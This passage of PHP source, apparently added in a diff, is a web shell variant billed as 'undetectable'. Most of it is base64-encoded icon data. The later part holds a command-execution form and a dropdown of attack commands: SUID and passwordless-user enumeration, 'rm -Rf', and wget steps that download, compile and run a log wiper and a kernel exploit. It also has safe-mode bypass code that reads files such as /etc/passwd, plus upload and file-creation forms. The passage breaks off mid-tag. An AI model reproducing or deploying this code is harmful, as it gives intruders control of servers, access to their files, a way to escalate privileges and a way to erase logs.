+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. 
+ $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! 
Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center>Undetectable version by <br> Spyk1r4 <br> <img src=\"http://emp3ror.com/images/emplogo1.gif\"></center>";} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo 
urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? + <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"> + <br> + Warning. 
Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... 
File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE 
style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo 